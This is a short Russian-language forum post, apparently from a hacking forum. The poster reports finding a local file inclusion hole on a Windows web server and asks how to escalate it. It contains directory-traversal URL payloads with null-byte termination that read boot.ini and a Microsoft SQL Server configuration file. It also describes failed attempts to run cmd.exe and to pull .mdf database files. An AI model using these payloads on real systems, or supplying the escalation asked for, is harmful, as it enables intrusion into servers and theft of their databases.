НАйден инклюд типа www.site.com/index.php?item=../../../../../../../../../boot.ini%00
какова дальнейшая последовательность действий? пытался передать параметры для cmd.exe, не выходит. Все конфиги в .php файлах, то есть инклудятся без отображения. Пытался вытащить mdf файлы по известным названиям баз данных, но тоже облом - пути вроде подобрал (/index.php?item=../../../../../../../../program%20files/microsoft%20sql%20server/mssql.1/mssql/binn/sqlctr.ini%00 выводится), а вот мдфники не выдираются..
Вобщем хелп, что тут можно попытатся сделать?